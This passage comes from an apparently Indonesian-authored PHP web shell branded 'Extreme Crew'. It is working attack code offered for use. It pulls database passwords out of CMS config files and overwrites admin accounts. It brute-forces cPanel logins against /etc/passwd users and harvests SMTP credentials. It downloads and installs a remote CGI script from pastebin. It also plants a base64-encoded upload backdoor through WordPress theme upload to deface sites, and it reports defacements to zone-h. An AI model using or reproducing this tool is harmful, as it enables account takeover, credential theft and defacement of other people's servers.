1140 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1141 $db = mysql_select_db($dbname);
1142 $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
1143 $result = mysql_fetch_array($q);
1144 $id = $result[user_id];
1145 $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
1146 $result2 = mysql_fetch_array($q2);
1147 $target = $result2[value];
1148 if($target == '') {
1149 $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1150 } else {
1151 $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
1152 }
1153 $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
1154 echo "Config => ".$file_conf."<br>";
1155 echo "CMS => Magento<br>";
1156 echo $url_target;
1157 if(!$update OR !$conn OR !$db) {
1158 echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1159 } else {
1160 echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1161 }
1162 mysql_close($conn);
1163 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
1164 $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
1165 $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
1166 $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
1167 $dbname = ambilkata($config,"'DB_DATABASE', '","'");
1168 $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
1169 $prefix = $dbprefix."user";
1170 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1171 $db = mysql_select_db($dbname);
1172 $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
1173 $result = mysql_fetch_array($q);
1174 $id = $result[user_id];
1175 $target = ambilkata($config,"HTTP_SERVER', '","'");
1176 if($target == '') {
1177 $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1178 } else {
1179 $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
1180 }
1181 $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
1182 echo "Config => ".$file_conf."<br>";
1183 echo "CMS => OpenCart<br>";
1184 echo $url_target;
1185 if(!$update OR !$conn OR !$db) {
1186 echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1187 } else {
1188 echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1189 }
1190 mysql_close($conn);
1191 } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
1192 $dbhost = ambilkata($config,'server = "','"');
1193 $dbuser = ambilkata($config,'username = "','"');
1194 $dbpass = ambilkata($config,'password = "','"');
1195 $dbname = ambilkata($config,'database = "','"');
1196 $prefix = "users";
1197 $option = "identitas";
1198 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1199 $db = mysql_select_db($dbname);
1200 $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
1201 $result = mysql_fetch_array($q);
1202 $target = $result[alamat_website];
1203 if($target == '') {
1204 $target2 = $result[url];
1205 $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1206 if($target2 == '') {
1207 $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1208 } else {
1209 $cek_login3 = file_get_contents("$target2/adminweb/");
1210 $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
1211 if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
1212 $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
1213 } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
1214 $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
1215 } else {
1216 $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
1217 }
1218 }
1219 } else {
1220 $cek_login = file_get_contents("$target/adminweb/");
1221 $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
1222 if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
1223 $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
1224 } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
1225 $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
1226 } else {
1227 $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
1228 }
1229 }
1230 $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
1231 echo "Config => ".$file_conf."<br>";
1232 echo "CMS => Lokomedia<br>";
1233 if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
1234 echo $url_target2;
1235 } else {
1236 echo $url_target;
1237 }
1238 if(!$update OR !$conn OR !$db) {
1239 echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1240 } else {
1241 echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1242 }
1243 mysql_close($conn);
1244 }
1245 }
1246 }
1247 } else {
1248 echo "<center>
1249 <h1>Auto Edit User Config</h1>
1250 <form method='post'>
1251 DIR Config: <br>
1252 <input type='text' size='50' name='config_dir' value='$dir'><br><br>
1253 Set User & Pass: <br>
1254 <input type='text' name='user_baru' value='Extreme Crew' placeholder='user_baru'><br>
1255 <input type='text' name='pass_baru' value='Extreme Crew' placeholder='pass_baru'><br>
1256 <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
1257 </form>
1258 <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
1259 ";
1260 }
1261} elseif($_GET['do'] == 'cpanel') {
1262 if($_POST['crack']) {
1263 $usercp = explode("\r\n", $_POST['user_cp']);
1264 $passcp = explode("\r\n", $_POST['pass_cp']);
1265 $i = 0;
1266 foreach($usercp as $ucp) {
1267 foreach($passcp as $pcp) {
1268 if(@mysql_connect('localhost', $ucp, $pcp)) {
1269 if($_SESSION[$ucp] && $_SESSION[$pcp]) {
1270 } else {
1271 $_SESSION[$ucp] = "1";
1272 $_SESSION[$pcp] = "1";
1273 if($ucp == '' || $pcp == '') {
1274
1275 } else {
1276 $i++;
1277 if(function_exists('posix_getpwuid')) {
1278 $domain_cp = file_get_contents("/etc/named.conf");
1279 if($domain_cp == '') {
1280 $dom = "<font color=red>gabisa ambil nama domain nya</font>";
1281 } else {
1282 preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
1283 foreach($domains_cp[1] as $dj) {
1284 $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1285 $user_cp_url = $user_cp_url['name'];
1286 if($user_cp_url == $ucp) {
1287 $dom = "<a href='http://$dj/' target='_blank'><font color=lime>$dj</font></a>";
1288 break;
1289 }
1290 }
1291 }
1292 } else {
1293 $dom = "<font color=red>function is Disable by system</font>";
1294 }
1295 echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>) domain ($dom)<br>";
1296 }
1297 }
1298 }
1299 }
1300 }
1301 if($i == 0) {
1302 } else {
1303 echo "<br>sukses nyolong ".$i." Cpanel by <font color=lime>Extreme Crew.</font>";
1304 }
1305 } else {
1306 echo "<center>
1307 <form method='post'>
1308 USER: <br>
1309 <textarea style='width: 450px; height: 150px;' name='user_cp'>";
1310 $_usercp = fopen("/etc/passwd","r");
1311 while($getu = fgets($_usercp)) {
1312 if($getu == '' || !$_usercp) {
1313 echo "<font color=red>Can't read /etc/passwd</font>";
1314 } else {
1315 preg_match_all("/(.*?):x:/", $getu, $u);
1316 foreach($u[1] as $user_cp) {
1317 if(is_dir("/home/$user_cp/public_html")) {
1318 echo "$user_cp\n";
1319 }
1320 }
1321 }
1322 }
1323 echo "</textarea><br>
1324 PASS: <br>
1325 <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
1326 function cp_pass($dir) {
1327 $pass = "";
1328 $dira = scandir($dir);
1329 foreach($dira as $dirb) {
1330 if(!is_file("$dir/$dirb")) continue;
1331 $ambil = file_get_contents("$dir/$dirb");
1332 if(preg_match("/WordPress/", $ambil)) {
1333 $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
1334 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
1335 $pass .= ambilkata($ambil,"password = '","'")."\n";
1336 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
1337 $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
1338 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
1339 $pass .= ambilkata($ambil,'password = "','"')."\n";
1340 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
1341 $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
1342 } elseif(preg_match("/^[client]$/", $ambil)) {
1343 preg_match("/password=(.*?)/", $ambil, $pass1);
1344 if(preg_match('/"/', $pass1[1])) {
1345 $pass1[1] = str_replace('"', "", $pass1[1]);
1346 $pass .= $pass1[1]."\n";
1347 } else {
1348 $pass .= $pass1[1]."\n";
1349 }
1350 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
1351 $pass .= ambilkata($ambil,"db_password = '","'")."\n";
1352 }
1353 }
1354 echo $pass;
1355 }
1356 $cp_pass = cp_pass($dir);
1357 echo $cp_pass;
1358 echo "</textarea><br>
1359 <input type='submit' name='crack' style='width: 450px;' value='Crack'>
1360 </form>
1361 <br><span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
1362 }
1363} elseif($_GET['do'] == 'smtp') {
1364 echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
1365 function scj($dir) {
1366 $dira = scandir($dir);
1367 foreach($dira as $dirb) {
1368 if(!is_file("$dir/$dirb")) continue;
1369 $ambil = file_get_contents("$dir/$dirb");
1370 $ambil = str_replace("$", "", $ambil);
1371 if(preg_match("/JConfig|joomla/", $ambil)) {
1372 $smtp_host = ambilkata($ambil,"smtphost = '","'");
1373 $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
1374 $smtp_user = ambilkata($ambil,"smtpuser = '","'");
1375 $smtp_pass = ambilkata($ambil,"smtppass = '","'");
1376 $smtp_port = ambilkata($ambil,"smtpport = '","'");
1377 $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
1378 echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
1379 echo "SMTP port: <font color=lime>$smtp_port</font><br>";
1380 echo "SMTP user: <font color=lime>$smtp_user</font><br>";
1381 echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
1382 echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
1383 echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
1384 }
1385 }
1386 }
1387 $smpt_hunter = scj($dir);
1388 echo $smpt_hunter;
1389} elseif($_GET['do'] == 'auto_wp') {
1390 if($_POST['hajar']) {
1391 $title = htmlspecialchars($_POST['new_title']);
1392 $pn_title = str_replace(" ", "-", $title);
1393 if($_POST['cek_edit'] == "Y") {
1394 $script = $_POST['edit_content'];
1395 } else {
1396 $script = $title;
1397 }
1398 $conf = $_POST['config_dir'];
1399 $scan_conf = scandir($conf);
1400 foreach($scan_conf as $file_conf) {
1401 if(!is_file("$conf/$file_conf")) continue;
1402 $config = file_get_contents("$conf/$file_conf");
1403 if(preg_match("/WordPress/", $config)) {
1404 $dbhost = ambilkata($config,"DB_HOST', '","'");
1405 $dbuser = ambilkata($config,"DB_USER', '","'");
1406 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1407 $dbname = ambilkata($config,"DB_NAME', '","'");
1408 $dbprefix = ambilkata($config,"table_prefix = '","'");
1409 $prefix = $dbprefix."posts";
1410 $option = $dbprefix."options";
1411 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1412 $db = mysql_select_db($dbname);
1413 $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
1414 $result = mysql_fetch_array($q);
1415 $id = $result[ID];
1416 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1417 $result2 = mysql_fetch_array($q2);
1418 $target = $result2[option_value];
1419 $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
1420 $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
1421 echo "<div style='margin: 5px auto;'>";
1422 if($target == '') {
1423 echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
1424 } else {
1425 echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
1426 }
1427 if(!$update OR !$conn OR !$db) {
1428 echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
1429 } else {
1430 echo "<font color=lime>sukses di ganti.</font><br>";
1431 }
1432 echo "</div>";
1433 mysql_close($conn);
1434 }
1435 }
1436 } else {
1437 echo "<center>
1438 <h1>Auto Edit Title+Content WordPress</h1>
1439 <form method='post'>
1440 DIR Config: <br>
1441 <input type='text' size='50' name='config_dir' value='$dir'><br><br>
1442 Set Title: <br>
1443 <input type='text' name='new_title' value='Hacked by Extreme Crew' placeholder='New Title'><br><br>
1444 Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
1445 <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
1446 <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
1447 <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
1448 </form>
1449 <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
1450 ";
1451 }
1452} elseif($_GET['do'] == 'domains'){echo "<center><div class='mybox'><p align='center' class='cgx2'>Domains and Users</p>";$d0mains = @file("/etc/named.conf");if(!$d0mains){die("<center>Error : can't read [ /etc/named.conf ]</center>");}echo '<table id="output"><tr bgcolor=#cecece><td>Domains</td><td>users</td></tr>';foreach($d0mains as $d0main){if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);flush();if(strlen(trim($domains[1][0])) > 2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td></tr>";flush();}}}echo'</div></center>';
1453} elseif($_GET['do'] == 'zoneh') {
1454 if($_POST['submit']) {
1455 $domain = explode("\r\n", $_POST['url']);
1456 $nick = $_POST['nick'];
1457 echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
1458 echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
1459 function zoneh($url,$nick) {
1460 $ch = curl_init("http://www.zone-h.com/notify/single");
1461 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1462 curl_setopt($ch, CURLOPT_POST, true);
1463 curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
1464 return curl_exec($ch);
1465 curl_close($ch);
1466 }
1467 foreach($domain as $url) {
1468 $zoneh = zoneh($url,$nick);
1469 if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
1470 echo "$url -> <font color=lime>OK</font><br>";
1471 } else {
1472 echo "$url -> <font color=red>ERROR</font><br>";
1473 }
1474 }
1475 } else {
1476 echo "<center><form method='post'>
1477 <u>Defacer</u>: <br>
1478 <input type='text' name='nick' size='50' value='Extreme Crew'><br>
1479 <u>Domains</u>: <br>
1480 <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
1481 <input type='submit' name='submit' value='Submit' style='width: 450px;'>
1482 </form>";
1483 }
1484 echo "</center>";
1485} elseif($_GET['do'] == 'cgi') {
1486 $cgi_dir = mkdir('ec_cgi', 0755);
1487 $file_cgi = "ec_cgi/cgi.izo";
1488 $isi_htcgi = "AddHandler cgi-script .izo";
1489 $htcgi = fopen(".htaccess", "w");
1490 $cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg");
1491 $cgi = fopen($file_cgi, "w");
1492 fwrite($cgi, $cgi_script);
1493 fwrite($htcgi, $isi_htcgi);
1494 chmod($file_cgi, 0755);
1495 echo "<iframe src='ec_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
1496} elseif($_GET['do'] == 'fake_root') {
1497 ob_start();
1498 $cwd = getcwd();
1499 $ambil_user = explode("/", $cwd);
1500 $user = $ambil_user[2];
1501 if($_POST['reverse']) {
1502 $site = explode("\r\n", $_POST['url']);
1503 $file = $_POST['file'];
1504 foreach($site as $url) {
1505 $cek = getsource("$url/~$user/$file");
1506 if(preg_match("/hacked/i", $cek)) {
1507 echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
1508 }
1509 }
1510 } else {
1511 echo "<center><form method='post'>
1512 Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
1513 User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
1514 Domain: <br>
1515 <textarea style='width: 450px; height: 250px;' name='url'>";
1516 reverse($_SERVER['HTTP_HOST']);
1517 echo "</textarea><br>
1518 <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
1519 </form><br>
1520 NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
1521 }
1522} elseif($_GET['do'] == 'adminer') {
1523 $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
1524 function adminer($url, $isi) {
1525 $fp = fopen($isi, "w");
1526 $ch = curl_init();
1527 curl_setopt($ch, CURLOPT_URL, $url);
1528 curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
1529 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1530 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
1531 curl_setopt($ch, CURLOPT_FILE, $fp);
1532 return curl_exec($ch);
1533 curl_close($ch);
1534 fclose($fp);
1535 ob_flush();
1536 flush();
1537 }
1538 if(file_exists('adminer.php')) {
1539 echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
1540 } else {
1541 if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
1542 echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
1543 } else {
1544 echo "<center><font color=red>gagal buat file adminer</font></center>";
1545 }
1546 }
1547} elseif($_GET['do'] == 'auto_dwp') {
1548 if($_POST['auto_deface_wp']) {
1549 function anucurl($sites) {
1550 $ch = curl_init($sites);
1551 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1552 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1553 curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1554 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
1555 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1556 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1557 curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1558 curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1559 curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1560 $data = curl_exec($ch);
1561 curl_close($ch);
1562 return $data;
1563 }
1564 function lohgin($cek, $web, $userr, $pass, $wp_submit) {
1565 $post = array(
1566 "log" => "$userr",
1567 "pwd" => "$pass",
1568 "rememberme" => "forever",
1569 "wp-submit" => "$wp_submit",
1570 "redirect_to" => "$web",
1571 "testcookie" => "1",
1572 );
1573 $ch = curl_init($cek);
1574 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1575 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1576 curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1577 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1578 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1579 curl_setopt($ch, CURLOPT_POST, 1);
1580 curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
1581 curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1582 curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1583 curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1584 $data = curl_exec($ch);
1585 curl_close($ch);
1586 return $data;
1587 }
1588 $scan = $_POST['link_config'];
1589 $link_config = scandir($scan);
1590 $script = htmlspecialchars($_POST['script']);
1591 $user = "Extreme Crew";
1592 $pass = "Extreme Crew";
1593 $passx = md5($pass);
1594 foreach($link_config as $dir_config) {
1595 if(!is_file("$scan/$dir_config")) continue;
1596 $config = file_get_contents("$scan/$dir_config");
1597 if(preg_match("/WordPress/", $config)) {
1598 $dbhost = ambilkata($config,"DB_HOST', '","'");
1599 $dbuser = ambilkata($config,"DB_USER', '","'");
1600 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1601 $dbname = ambilkata($config,"DB_NAME', '","'");
1602 $dbprefix = ambilkata($config,"table_prefix = '","'");
1603 $prefix = $dbprefix."users";
1604 $option = $dbprefix."options";
1605 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1606 $db = mysql_select_db($dbname);
1607 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1608 $result = mysql_fetch_array($q);
1609 $id = $result[ID];
1610 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1611 $result2 = mysql_fetch_array($q2);
1612 $target = $result2[option_value];
1613 if($target == '') {
1614 echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
1615 } else {
1616 echo "[+] $target <br>";
1617 }
1618 $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
1619 if(!$conn OR !$db OR !$update) {
1620 echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
1621 mysql_close($conn);
1622 } else {
1623 $site = "$target/wp-login.php";
1624 $site2 = "$target/wp-admin/theme-install.php?upload";
1625 $b1 = anucurl($site2);
1626 $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
1627 $b = lohgin($site, $site2, $user, $pass, $wp_sub);
1628 $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
1629 $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
1630 $www = "m.php";
1631 $fp5 = fopen($www,"w");
1632 fputs($fp5,$upload3);
1633 $post2 = array(
1634 "_wpnonce" => "$anu2",
1635 "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
1636 "themezip" => "@$www",
1637 "install-theme-submit" => "Install Now",
1638 );
1639 $ch = curl_init("$target/wp-admin/update.php?cr0tz=3xcr3w&action=upload-theme");
1640 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1641 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1642 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1643 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1644 curl_setopt($ch, CURLOPT_POST, 1);
1645 curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
1646 curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1647 curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1648 curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1649 $data3 = curl_exec($ch);
1650 curl_close($ch);
1651 $y = date("Y");
1652 $m = date("m");
1653 $namafile = "id.php";
1654 $fpi = fopen($namafile,"w");
1655 fputs($fpi,$script);
1656 $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
1657 curl_setopt($ch6, CURLOPT_POST, true);
1658 curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
1659 curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
1660 curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
1661 curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
1662 curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
1663 $postResult = curl_exec($ch6);
1664 curl_close($ch6);
1665 $as = "$target/k.php";
1666 $bs = anucurl($as);
1667 if(preg_match("#$script#is", $bs)) {
1668 echo "[+] <font color='lime'>berhasil mepes...</font><br>";
1669 echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
1670 } else {
1671 echo "[-] <font color='red'>gagal mepes...</font><br>";
1672 echo "[!!] coba aja manual: <br>";
1673 echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
1674 echo "[+] username: <font color=lime>$user</font><br>";
1675 echo "[+] password: <font color=lime>$pass</font><br><br>";
1676 }
1677 mysql_close($conn);
1678 }
1679 }
1680 }
1681 } else {
1682 echo "<center><h1>WordPress Auto Deface</h1>
1683 <form method='post'>
1684 <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
1685 <input type='text' name='script' height='10' size='50' placeholder='Hacked by Extreme Crew' required><br>
1686 <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
1687 </form>
1688 <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
1689 </center>";
1690 }
1691} elseif($_GET['do'] == 'auto_dwp2') {
1692 if($_POST['auto_deface_wp']) {
1693 function anucurl($sites) {
1694 $ch = curl_init($sites);
1695 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1696 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1697 curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1698 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
1699 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1700 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1701 curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1702 curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1703 curl_setopt($ch, CURLOPT_COOKIESESSION,true);
1704 $data = curl_exec($ch);
1705 curl_close($ch);
1706 return $data;
1707 }
1708 function lohgin($cek, $web, $userr, $pass, $wp_submit) {
1709 $post = array(
1710 "log" => "$userr",
1711 "pwd" => "$pass",
1712 "rememberme" => "forever",
1713 "wp-submit" => "$wp_submit",
1714 "redirect_to" => "$web",
1715 "testcookie" => "1",
1716 );
1717 $ch = curl_init($cek);
1718 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1719 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1720 curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1721 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1722 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1723 curl_setopt($ch, CURLOPT_POST, 1);
1724 curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
1725 curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1726 curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1727 curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1728 $data = curl_exec($ch);
1729 curl_close($ch);
1730 return $data;
1731 }
1732 $link = explode("\r\n", $_POST['link']);
1733 $script = htmlspecialchars($_POST['script']);
1734 $user = "Extreme Crew";
1735 $pass = "Extreme Crew";
1736 $passx = md5($pass);
1737 foreach($link as $dir_config) {
1738 $config = anucurl($dir_config);
1739 $dbhost = ambilkata($config,"DB_HOST', '","'");
1740 $dbuser = ambilkata($config,"DB_USER', '","'");
1741 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1742 $dbname = ambilkata($config,"DB_NAME', '","'");
1743 $dbprefix = ambilkata($config,"table_prefix = '","'");
1744 $prefix = $dbprefix."users";
1745 $option = $dbprefix."options";
